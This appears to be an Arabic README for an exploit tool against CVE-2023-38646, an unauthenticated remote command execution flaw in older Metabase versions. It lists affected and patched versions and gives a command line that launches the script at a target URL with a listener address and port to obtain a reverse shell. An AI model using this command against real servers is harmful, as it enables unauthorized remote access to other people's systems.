
تم تصميم هذا السكربت لاستغلال الإصدارات الهشّة من برنامج Metabase عبر منحك، كمهاجم، شل.
تسمح نسخ Metabase مفتوحة المصدر الأقدم من 0.46.6.1 ونسخ Metabase Enterprise الأقدم من 1.46.6.1 للمهاجمين بتنفيذ أوامر تعسفية على الخادم بصلاحيات الخادم نفسه. لا تُشترط المصادقة لاستغلال الثغرة. الإصدارات الأخرى المُصحَّحة هي 0.45.4.1 و1.45.4.1 و0.44.7.1 و1.44.7.1 و0.43.7.2 و1.43.7.2.
إذا كان إصدار Metabase المستخدم معرّضًا للثغرة، فسيسمح لك هذا السكربت، بصفتك مهاجمًا، بالحصول على اتصال شل على النظام المستهدف.
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

المؤلف: @birdm4nw